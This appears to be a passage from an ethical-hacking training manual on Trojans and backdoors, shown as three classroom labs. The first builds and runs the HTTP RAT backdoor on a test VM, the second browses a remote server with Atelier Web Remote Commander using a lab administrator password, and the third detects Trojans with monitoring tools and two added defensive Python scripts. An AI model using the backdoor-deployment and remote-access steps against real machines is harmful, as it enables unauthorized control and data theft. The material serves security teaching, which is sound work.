1. Determine whether the McAfee HTTP Proxy Server Trojan supports ports other than 8080.

2. Evaluate the drawbacks of using the HTTP proxy server Trojan to access the Internet.

Internet Connection Required: ☑ Yes ☐ No

Platform Supported: ☑ Classroom ☐ iLabs


HTTP Trojan

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

Hackers have a variety of motives for installing malevolent software (malware). This type of software tends to yield instant access to the system to continuously steal various types of information from it, for example, a company's strategic designs or credit card numbers. A backdoor is a program or a set of related programs that a hacker installs on the victim computer to allow access to the system at a later time. A backdoor's goal is also to remove the evidence of the initial entry from the system's logs. Hacker-dedicated websites give examples of many tools that serve to install backdoors, with the difference that once a connection is established the intruder must log in by entering a predefined password.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

• Running the HTTP Trojan on Windows Server 2008

• Accessing the Windows Server 2008 machine's process list using the HTTP proxy

• Killing running processes on the Windows Server 2008 Virtual Machine

Lab Environment

To carry out this, you need:


■ HTTP RAT located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN

■ A computer running Windows Server 2008 (host)

■ Windows 8 running in a Virtual Machine

■ Windows Server 2008 in a Virtual Machine

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ A web browser to access the Internet

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and appearance may differ from what is in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

1. Log in to the Windows 8 Virtual Machine, and open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.

FIGURE 5.1: Windows 8 Start menu (Windows 8 Release Preview, Evaluation copy, Build 8400)

2. Click Services in the Start menu to launch Services.

TASK 1: HTTP RAT


FIGURE 5.2: Windows 8 Start menu Apps

Note: Stopping the World Wide Web Publishing Service is mandatory, as HTTP RAT runs on port 80.

3. Disable/Stop the World Wide Web Publishing Service.

FIGURE 5.3: Administrative Tools -> Services window (World Wide Web Publishing Service: "Provides Web connectivity and administration through the Internet Information Services Manager", Status Running, Startup Type Manual)

4. Right-click the World Wide Web Publishing Service and select Properties to disable the service.


FIGURE 5.4: Disable/Stop the World Wide Web Publishing Service (Properties, General tab: Service name W3SVC; Path to executable C:\Windows\system32\svchost.exe -k iissvcs; Startup type Disabled; Service status Stopped)

5. Now start HTTP RAT from the location Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.

FIGURE 5.5: HTTP RAT main window (HTTP RAT "backdoor Web server" by zOmbie, version 0.31; latest version here: http://freenet.am/~zombie; settings: send notification with ip address to mail, SMTP server for sending mail (several servers can be specified, delimited with ;), your email address, server port 80, close FireWalls; Create and Exit buttons)

Note: The send notification option can be used to send the details to your mail ID.

6. Disable the Send notification with ip address to mail option.

7. Click Create to create an httpserver.exe file.


FIGURE 5.6: Create backdoor (send notification option disabled, server port 80)

FIGURE 5.7: Backdoor server created successfully ("done! send httpserver.exe 2 victim")

8. The httpserver.exe file should be created in the folder Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\HTTP HTTPS Trojans\HTTP RAT TROJAN.

9. Double-click the file and click Run.

Note: The created httpserver will be placed in the tool directory.


[Screenshot: Explorer window showing httpserver.exe in the HTTP RAT TROJAN folder, with the Open File - Security Warning dialog: "The publisher could not be verified. Are you sure you want to run this software?" Name: ...\HTTP HTTPS Trojans\HTTP RAT TROJAN\httpserver.exe; Publisher: Unknown Publisher; Type: Application; "This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust."; Run and Cancel buttons]

FIGURE 5.8: Running the Backdoor

10. Go to Task Manager and check whether the process is running.

[Screenshot: Task Manager, Processes tab. Under Background processes, Httpserver (32 bit) is listed at 0% CPU, 1.2 MB memory, 0 MB/s disk and 0 Mbps network, alongside Snagit, Windows Search Indexer and other ordinary processes]

FIGURE 5.9: Backdoor running in Task Manager

11. Go to Windows Server 2008 and open a web browser to access the Windows 8 machine (here 10.0.0.12 is the IP address of the Windows 8 machine): browse to http://10.0.0.12/. The backdoor answers on the server port chosen when it was created (80), so no port needs to be given in the URL.


[Screenshot: browser on Windows Server 2008 showing zOmbie's HTTP_RAT page: "welcome 2 HTTP_RAT infected computer }:]" with the links [running processes] [browse] [computer info] [stop httprat] [have suggestions?] [homepage]]

FIGURE 5.10: Access the backdoor in the host web browser

12. Click running processes to list the processes running on the Windows 8 machine.

[Screenshot: the "running processes" page served by the backdoor, listing the victim's processes (System, smss.exe, csrss.exe, wininit.exe, winlogon.exe, services.exe, lsass.exe, several svchost.exe, dwm.exe, spoolsv.exe, MsMpEng.exe, taskhost.exe, explorer.exe, SearchIndexer.exe, Snagit32.exe, TscHelp.exe, SnagPriv.exe, SnagitEditor.exe, splwow64.exe, httpserver.exe, Taskmgr.exe, firefox.exe), each followed by a [kill] link]

FIGURE 5.11: Process list of the victim computer

13. You can kill any running process from here. Everything the backdoor offers (process listing, file browsing, killing processes) is driven by plain HTTP requests to TCP port 80 on the infected host. That matters for the question below: at the port level the traffic looks like ordinary web serving, so detection has to look at which process owns the listener, not at the port number alone.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: HTTP Trojan (HTTP RAT)

Information Collected/Objectives Achieved:

■ httpserver.exe successfully delivered to and run on the victim machine

■ Output: the victim's process list, each process with a kill option: System, smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, dwm.exe, splwow64.exe, httpserver.exe, firefox.exe

Questions

1. Determine the ports that the HTTP Trojan (HTTP RAT) uses to communicate.

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Remote Access Trojans Using Atelier Web Remote Commander

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

A backdoor Trojan is a very dangerous infection that compromises the integrity of a computer, its data, and the personal information of its users. Remote attackers use backdoors as a means of accessing and taking control of a computer while bypassing its security mechanisms. Trojans and backdoors are types of malware whose main purpose is to send and receive data, and especially commands, through a port to another system. This port can be a well-known port such as 80 or an unusual one such as 7777. Trojans are most of the time disguised as legitimate and harmless applications to encourage the user to execute them.

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of this lab include:

• G ain access to a remote computer

• Acquire sensitive inform ation o f the remote computer

Lab Environment

To carry out this lab, you need:

1. Atelier Web Remote Commander, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Atelier Web Remote Commander


Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors


■ A computer running Windows Server 2012, where AWRC is installed and launched in the steps below

■ Windows Server 2008 running in a virtual machine, the remote target (10.0.0.13 in the steps below)

■ If you decide to download the latest version, the screenshots shown in the lab might differ

■ A web browser to access the Internet

■ Administrative privileges to run the tools; AWRC additionally needs administrator credentials on the target

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

1. Install and launch Atelier Web Remote Commander (AWRC) in Windows Server 2012.

2. To launch AWRC, open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.

[Screenshot: Windows Server 2012 desktop with the Start corner hotspot in the lower-left]

FIGURE 6.1: Windows Server 2012 Start-Desktop

3. Click AW Remote Commander Professional in the Start menu apps.

TASK 1: Atelier Web Remote Commander


[Screenshot: Windows Server 2012 Start screen (Administrator) showing the AW Remote Commander tile under Tools]

FIGURE 6.2: Windows Server 2012 Start Menu Apps

4. The main window of AWRC appears as shown in the following screenshot.

[Screenshot: AWRC PRO 9.3.9 main window. Tabs: Desktop, SysInfo, NetworkInfo, File System, Users and Groups, Chat. Fields for Remote Host, User Name and Password with Connect and Disconnect buttons, a "Request authorization" option, a "Clear on disconnect" option, a Progress Report pane and kBytesIn / kBpsIn / Connection Duration counters]

Note: This tool is used to gain access to all the information of the remote system.

FIGURE 6.3: Atelier Web Remote Commander main window

5. Enter the IP address and the user name / password of the remote computer.

6. In this lab we have used Windows Server 2008 (10.0.0.13):
■ User name: Administrator
■ Password: qwerty@123

Note: The IP addresses and credentials might differ in your lab.

7. Click Connect to access the machine remotely. Note that nothing is installed on the target in this lab: the administrator credentials alone give the tool everything it needs, which is why a leaked local administrator password is as good as a backdoor on every machine where it is valid.


FIGURE 6.4: Providing remote computer details

8. The following screenshot shows that you are accessing Windows Server 2008 remotely.

[Screenshot: AWRC connected to 10.0.0.13, Desktop tab showing the remote Windows Server 2008 desktop (Internet Explorer, Windows Update and Notepad icons). Progress Report: "#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13". Connection Duration: 1 minute, 42 seconds; kBytesIn: 201.94]


FIGURE 6.5: Remote computer Accessed

9. AWRC is now connected to the remote system. Click the SysInfo tab to view complete details of the virtual machine.


FIGURE 6.6: Information of the remote computer

10. Select the NetworkInfo tab to view network information. The shares it lists (ADMIN$, C$, IPC$) are the built-in administrative shares that every Windows server exposes by default; they are reachable only with administrative credentials, which is exactly what this tool was given.

[Screenshot: NetworkInfo tab (IP/Transport Protocols, Ports, Shares, Password). The Shares view lists ADMIN$ (Remote Admin), C$ (Default share) and IPC$ (Remote IPC), all Special shares with unlimited Max Uses. Connection Duration: 5 minutes, 32 seconds; kBytesIn: 250.93]


FIGURE 6.7: Information of the remote computer

11. Select the File System tab. Select c:\ from the drop-down list and click Get.

12. This tab lists the complete contents of the C:\ drive of Windows Server 2008.


[Screenshot: File System tab, contents of c: on 10.0.0.13: $Recycle.Bin, Boot, Documents and Settings, PerfLogs, Program Files (x86), Program Files, ProgramData, System Volume Information, Users, Windows. Fixed Capacity: 17,177,767,936 bytes; Free space: 6,505,771,008 bytes; File System: NTFS; Serial Number: 6C27-CD39. Connection Duration: 6 minutes, 18 seconds; kBytesIn: 251.64]

FIGURE 6.8: Information of the remote computer

13. Select Users and Groups, which displays the complete user details.

[Screenshot: Users and Groups tab, Users sub-tab (Users, Groups, Password Hashes). User Information for Administrator: Password Age: 7 days 21 hours 21 minutes 33 seconds; Privilege Level: Administrator; Comment: Built-in account for administering the computer/domain; Flags: Logon script executed, Normal Account; Workstations can log on from: no restrictions; Last Logon: 9/20/2012 3:58:24 AM; Last Logoff: Unknown; Account expires: Never; User ID (RID): 500; Primary Global Group (RID): 513; SID: S-1-5-21-1858180243-3007315151-1600596200-500; Domain: WIN-EGBHISG14L0; No. SubAuthorities: 5. Connection Duration: 6 minutes, 26 seconds]

FIGURE 6.9: Information of the remote computer


[Screenshot: Groups sub-tab listing the built-in aliases with their SIDs: Administrators S-1-5-32-544, Backup Operators S-1-5-32-551, Certificate Service DCOM Access S-1-5-32-574, Cryptographic Operators S-1-5-32-569, Distributed COM Users S-1-5-32-562, Event Log Readers S-1-5-32-573, Guests S-1-5-32-546; below, the account's group membership S-1-5-21-1858180243-3007315... (Ordinary users). Connection Duration: 7 minutes, 34 seconds; kBytesIn: 257.54]

FIGURE 6.10: Information of the remote computer

FIGURE 6.11: Information of the remote computer

14. This tool displays all the details of the remote system.

15. Analyze the results of the remote computer.

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Atelier Web Remote Commander

Information Collected/Objectives Achieved:

■ Remotely accessing Windows Server 2008

■ Result: system information of the remote Windows Server 2008

■ Network information (shares and paths) of the remote Windows Server 2008

■ Complete file listing of c:\ on the remote Windows Server 2008

■ Users and Groups details of the remote Windows Server 2008

■ Password hashes

Questions

1. Evaluate the ports that AWRC uses to perform its operations.

2. Determine whether it is possible to launch AWRC from the command line and make a connection. If yes, then illustrate how it can be done.

Internet Connection Required

☐ Yes ☑ No

Platform Supported

☑ Classroom


Detecting Trojans

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario

Most individuals are confused about the possible ways to remove a Trojan from a specific system. One must realize that the World Wide Web is one of the tools that transmits information as well as malicious and harmful programs. A backdoor Trojan can be extremely harmful if not dealt with appropriately. The main function of this type of malware is to create a backdoor in order to access a specific system. With a backdoor Trojan attack, the affected user is unaware of the possible effects until sensitive and important information is found missing from the system. With a backdoor Trojan attack, a hacker can also perform other types of malicious attacks. Another name for backdoor Trojans is remote access Trojans. The main reason backdoor Trojans are so dangerous is that they give the attacker the ability to access a particular machine remotely (source: http://www.combofix.org).

You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives

The objective of this lab is to help students learn to detect Trojan and backdoor attacks.

The objectives of the lab include:

• Analyze using Port Monitor

• Analyze using Process Monitor

• Analyze using Registry Monitor

• Analyze using Startup Program Monitor

• Create MD5 hash files for Windows directory files
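The last objective, a hash baseline of the Windows directory, is carried out in the lab with Fsum Frontend. The script below is an added example written for this page, not the tool's code or the manual's: it builds the same kind of baseline with Python's hashlib, stores it as JSON, and later diffs a fresh scan against it to report added, removed and changed files. It defaults to SHA-256; MD5 (which Fsum Frontend produces) is selectable for compatibility with an existing hash list, but it should not be relied on against a deliberate attacker, since MD5 collisions are practical. The demo() function constructs a small temporary tree and tampers with it so the example runs offline; the file names in it are illustrative, not lab data.

```python
"""Hash baseline of a directory tree plus a later diff: the check that the
hashing objective of this lab performs with Fsum Frontend."""
import hashlib
import json
import os
import tempfile


def hash_file(path, algorithm="sha256", chunk=1 << 16):
    """Digest a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root, algorithm="sha256"):
    """Return {relative path: digest} for every regular file under root.
    Symlinks are skipped so a link planted into the tree cannot make the
    scan read (and vouch for) a file outside it."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full, algorithm)
    return baseline


def save_baseline(baseline, path):
    """Persist the baseline; keep this file off the scanned tree and read-only."""
    with open(path, "w", encoding="utf-8") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path, "r", encoding="utf-8") as f:
        return json.load(f)


def compare(old, new):
    """Return (added, removed, changed) relative paths between two baselines."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return added, removed, changed


def demo():
    """Constructed demonstration (not lab data): baseline a small tree, let a
    'Trojan' overwrite one file and drop another, then diff. Returns the diff."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        sub = os.path.join(root, "System32")
        os.makedirs(sub)
        with open(os.path.join(sub, "dns.exe"), "wb") as f:
            f.write(b"MZ original dns.exe bytes")
        with open(os.path.join(root, "notepad.exe"), "wb") as f:
            f.write(b"MZ notepad bytes")
        baseline_path = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), baseline_path)

        # Later: the backdoor has replaced dns.exe and added httpserver.exe.
        with open(os.path.join(sub, "dns.exe"), "wb") as f:
            f.write(b"MZ trojanised dns.exe bytes")
        with open(os.path.join(sub, "httpserver.exe"), "wb") as f:
            f.write(b"MZ backdoor")

        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    added, removed, changed = demo()
    print("added:", added)
    print("removed:", removed)
    print("changed:", changed)
```

For a real check, run build_baseline on C:\Windows while the machine is known-good, save the result somewhere the machine cannot write to, and diff a fresh scan against it after a suspected infection; the baseline is only as trustworthy as the moment it was taken.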


Lab Environment

To carry out this lab, you need:

■ TCPView, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView

■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns

■ PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Backdoors\Process Monitor Tool\Prc View

■ jv16 PowerTools, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012

■ Fsum Frontend, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend

■ A computer running Windows Server 2008 (host)

■ Windows Server 2012 running in a virtual machine (the tasks below are performed there)

■ If you decide to download the latest version, the screenshots shown in the lab might differ

■ A web browser to access the Internet

■ Administrative privileges to run the tools

Lab Duration

Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks

1. Go to the Windows Server 2012 virtual machine.

2. Install TCPView from the location D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.

3. The TCPView main window appears, with details such as Process, Process ID, Protocol, Local Address, Local Port, Remote Address, and Remote Port.

Note (Autoruns, Disabling and Deleting Entries): If you don't want an entry to be active the next time you boot or log in, you can either disable or delete it. To disable an entry, uncheck it; Autoruns stores the startup information in a backup location so that it can reactivate the entry when you recheck it. For items stored in startup folders, Autoruns creates a subfolder named AutorunsDisabled. Check a disabled item to re-enable it.

TASK 1: TCPView


[Screenshot: TCPView main window. Columns: Process, PID, Protocol, Local Address, Local Port, Remote Address, Remote Port, State. dns.exe (PID 1572) owns TCP listeners on the domain port and on 49157, and a run of UDP sockets on the domain port and on ports 49152 through 49171, all on WIN-2N9STOSGIEN]

FIGURE 8.1: TCPView main window

4. The tool performs live port monitoring: each row is one socket, and the Process and PID columns tie it to the image that owns it.

[Screenshot: TCPView scrolled to svchost.exe (several PIDs) listening on TCP 5504, 49153, 49154, 49159, 49161, 49163, 49168, 49169 and 49187 and on UDP bootps, bootpc, isakmp, 2535, 3391, teredo, ipsec-msft, llmnr and 53441, and to System (PID 4) listening on TCP netbios-ssn, microsoft-ds, http, https and 5985]

FIGURE 8.2: TCPView main window

5. Now examine the SMB (microsoft-ds) and other ports: the Remote Address and State columns show which sockets are merely LISTENING (remote port 0) and which have ESTABLISHED connections to other hosts.

Note (Autoruns): Delete items that you never want to execute by choosing Delete in the Entry menu. Only the currently selected item is deleted.

Note (Autoruns): If you are running Autoruns without administrative privileges on Windows Vista or later and attempt to change the state of a global entry, you will be denied access.

[Screenshot: TCPView with the Remote Address, Remote Port and State columns visible. The TCP listeners show a remote port of 0 and state LISTENING; two microsoft-ds (SMB) connections are ESTABLISHED from other lab machines, one of them windows8 (remote port 49481)]

FIGURE 8.3: TCPView analyzing ports

You can also kill a process by double-clicking its row and then clicking the End Process button. Note that TCPView prints service names in place of well-known port numbers (http for 80, https for 443, microsoft-ds for 445, domain for 53); a Trojan bound to port 80 therefore shows up as "http" and is told apart from IIS only by the Process and PID columns.

[Screenshot: Properties for dns.exe: 1572. Domain Name System (DNS) Server, Microsoft Corporation, Version 6.02.8400.0000, Path: C:\Windows\System32\dns.exe; End Process and OK buttons]

FIGURE 8.4: Killing processes
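The HTTP Trojan lab earlier in this module asks which port the Trojan communicates on, and the TCPView steps above answer that interactively. The following script does the same triage non-interactively from the output of two built-in Windows commands, `netstat -ano` and `tasklist /fo csv /nh`. It is an added example written for this page, not part of the lab manual or of TCPView, and it runs on constructed sample output rather than data captured from the lab machines. The allowlist of expected port owners (EXPECTED_OWNERS) is an assumption for a plain IIS/file server and should be adjusted to the machine being checked.

```python
"""Tie every listening TCP socket to its owning image and flag the ones whose
owner is not what that port should have: the check TCPView does interactively."""
import csv
import io
import re

# Constructed sample of `netstat -ano` output (not captured from the lab VMs).
# It mirrors the lab: IIS was stopped, so port 80 now belongs to PID 3412.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       3412
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       724
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1140
  TCP    10.0.0.12:49481        10.0.0.13:445          ESTABLISHED     4
  TCP    [::]:80                [::]:0                 LISTENING       3412
  UDP    0.0.0.0:5355           *:*                                    1064
"""

# Constructed sample of `tasklist /fo csv /nh` output.
TASKLIST_SAMPLE = '''"System","4","Services","0","1,072 K"
"svchost.exe","724","Services","0","6,204 K"
"svchost.exe","1064","Services","0","4,100 K"
"svchost.exe","1140","Services","0","8,912 K"
"httpserver.exe","3412","Console","1","1,228 K"
"explorer.exe","2008","Console","1","25,716 K"
'''

# Assumed allowlist for a plain IIS/file server; tune it per machine.
# Listeners registered through http.sys are reported under System (PID 4),
# so "system" is a legitimate owner of 80 and 443.
EXPECTED_OWNERS = {
    80: {"system", "w3wp.exe"},
    443: {"system", "w3wp.exe"},
    135: {"svchost.exe"},
    445: {"system"},
    3389: {"svchost.exe"},
}

# Proto, local, foreign, optional state (absent for UDP rows), PID.
NETSTAT_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_tasklist(text):
    """Return {pid: image name in lower case} from `tasklist /fo csv /nh` output."""
    return {int(row[1]): row[0].lower()
            for row in csv.reader(io.StringIO(text)) if len(row) >= 2}


def parse_listeners(text):
    """Return [(ip, port, pid)] for every LISTENING TCP socket in `netstat -ano` output."""
    listeners = []
    for line in text.splitlines():
        m = NETSTAT_LINE.match(line)
        if not m:
            continue
        proto, local, _foreign, state, pid = m.groups()
        if proto != "TCP" or state != "LISTENING":
            continue
        ip, port = local.rsplit(":", 1)  # rsplit copes with [::]:80 as well as 0.0.0.0:80
        listeners.append((ip, int(port), int(pid)))
    return listeners


def suspicious_listeners(netstat_text, tasklist_text):
    """Return [(port, pid, image)] for listeners on a port in EXPECTED_OWNERS
    whose owning image is not one of the expected ones (one entry per port/PID)."""
    owners = parse_tasklist(tasklist_text)
    findings, seen = [], set()
    for _ip, port, pid in parse_listeners(netstat_text):
        image = owners.get(pid, "<no such pid>")
        if port in EXPECTED_OWNERS and image not in EXPECTED_OWNERS[port] and (port, pid) not in seen:
            seen.add((port, pid))
            findings.append((port, pid, image))
    return findings


if __name__ == "__main__":
    for port, pid, image in suspicious_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(f"TCP {port} is owned by {image} (PID {pid}), which is not an expected owner")
```

Run the two commands on the suspect machine, save their output, and pass the text to suspicious_listeners(). On the sample it reports a single finding, port 80 owned by httpserver.exe (PID 3412), which is exactly the process Task Manager showed in the HTTP Trojan lab; the IPv4 and IPv6 sockets of the same process are collapsed into one line.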

6. Go to the Windows Server 2012 virtual machine.

7. Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns.

8. It lists all auto-starting processes, DLLs, and services.

Note: Autoruns displays a dialog with a button that lets you relaunch it with administrative rights. You can also use the -e command-line option to launch Autoruns with administrative rights from the start.

Note: There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit, choose Jump To in the Entry menu, or double-click the entry's or location's line in the display.

TASK 2: Autoruns


Note: You can view Explorer's file properties dialog for an entry's image file by choosing Properties in the Entry menu. You can also have Autoruns execute an Internet search in your browser by selecting Search Online in the Entry menu.

Note: Simply run Autoruns and it shows you the currently configured auto-start applications in the locations that most directly execute applications. Perform a new scan that reflects changes to options by refreshing the display.

10. The following is the detailed list on the Logon tab.

Note (Internet Explorer tab): This shows Browser Helper Objects (BHOs), Internet Explorer toolbars and extensions.

11. The following are the Explorer list details.

[Screenshot: Autoruns [WIN-2N9STOSGIEN\Administrator], Logon tab. Entries: HotKeysCmds, IgfxTray and Persistence (Intel Corporation, c:\windows\system32\...); Adobe ARM and Adobe Reader Speed Launcher (Adobe Systems Incorporated); EPSON_UD_S (EPSON USB Display V1.40, SEIKO EPSON CORPORATION); googletalk (Google); SunJavaUpdateSched (Java Update Scheduler, Sun Microsystems, Inc.); and the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder]

FIGURE 8.9: Autoruns Logon list

[Screenshot: Autoruns Everything tab, grouped by location: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AppSetup (UsrLogon, cmd, c:\windows\system32\usrlogon...); HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (HotKeysCmds, IgfxTray, Persistence, Intel Corporation); HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run (Adobe ARM, Adobe Reader, EPSON_UD_S)]

FIGURE 8.5: Autoruns main window


[Screenshot: Autoruns Explorer tab: HKLM\SOFTWARE\Classes\Protocols\Filter (text/xml, Microsoft Office XML MIME filter, Microsoft Corporation); HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers, its Wow6432Node twin and HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers (SnagItMainShellExt, TechSmith Corporation; WinRAR / WinRAR32 shell extension, Alexander Roshal)]

Note (Services tab): All Windows services configured to start automatically when the system boots.

FIGURE 8.10: Autoruns Explorer list

12. The following are the Services list details.

Drivers: Displays all kernel-mode drivers registered on the system except those that are disabled.

FIGURE 8.11: Autoruns Services list

13. The following are the Drivers list details.


Scheduled Tasks: Task scheduler tasks configured to start at boot or logon.

FIGURE 8.12: Autoruns Drivers list.

14. The following is the KnownDLLs list in Autoruns.

FIGURE 8.13: Autoruns Known DLLs list. (The KnownDLLs entries wow64, wow64cpu and wow64win are shown with "File not found".)

15. Install and launch jv16 PowerTools in Windows Server 2012 (host machine).

16. jv16 PowerTools is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.

17. To launch jv16 PowerTools, select the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

TASK 4

jv16 PowerTools


FIGURE 7.1: Windows Server 2012 Start-Desktop

18. Click jv16 PowerTools 2012 in the Start menu apps.

Winlogon Notifications: Shows DLLs that register for Winlogon notification of logon events.

FIGURE 7.2: Windows Server 2012 Start Menu Apps

19. Click the Clean and fix my computer icon.

Winsock Providers: Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can uninstall them, but cannot disable them.


FIGURE 8.20: jv16 Home page. (Home tools shown: Speed up my computer; Fully remove software and leftovers; Immunize my computer; Verify my downloads are safe to run; Control which programs start automatically. The status pane reports the PC health score and registry health score out of 100.)

20. The Clean and fix my computer dialog box appears. Click the Settings tab and then click the Start button.

FIGURE 8.21: jv16 Clean and fix my computer dialogue. (Settings tab: emphasize safety over both scan speed and the number of found errors, or emphasize the number of found errors and speed over safety and accuracy. The Normal system scan policy skips all Windows-related data for additional safety and lists only old temp files.)

21. It will analyze your system for files; this will take a few minutes.

Print Monitor Drivers: Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself.

22. Computer items will be listed after the complete analysis.

You can save the results of a scan with File->Save and load a saved scan with File->Load. These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command line options.

23. Selected item details are as follows.

Sidebar: Displays Windows sidebar gadgets.

FIGURE 8.24: jv16 Clean and fix my computer items details. (Items found: Registry Errors 7, of which Invalid file or directory reference 7; Registry junk 266, of which Obsolete software entry 4, Useless empty key 146, Useless file extension 116; Start menu and desktop items 23; total 296.)

FIGURE 8.22: jv16 Clean and fix my computer analyzing.

LSA Providers: Shows registered Local Security Authority (LSA) authentication, notification and security packages.


FIGURE 8.23: jv16 Clean and fix my computer items.

24. The Registry junk section provides details for selected items.

FIGURE 8.25: jv16 Clean and fix my computer item registry junk.

25. Select all check boxes in the item list and click Delete. A dialog box appears. Click Yes.


Compare the current Autoruns display with previous results that you've saved. Select File | Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted items.

If you are running Autoruns without administrative privileges on Windows Vista and attempt to change the state of a global entry, you'll be denied access. Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights.

When the Hide Empty Locations selection in the Options menu is checked, Autoruns doesn't show locations with no entries.


FIGURE 8.26: jv16 Clean and fix my computer item check box. (The confirmation dialog reads: "You are about to delete a lot of erroneous registry data. Using the Fix option is always the better option. Are you sure you know what you are doing and want to proceed?")

26. Go to the Home tab, and click the Control which programs start automatically icon.

FIGURE 8.28: jv16 Control which programs start automatically.

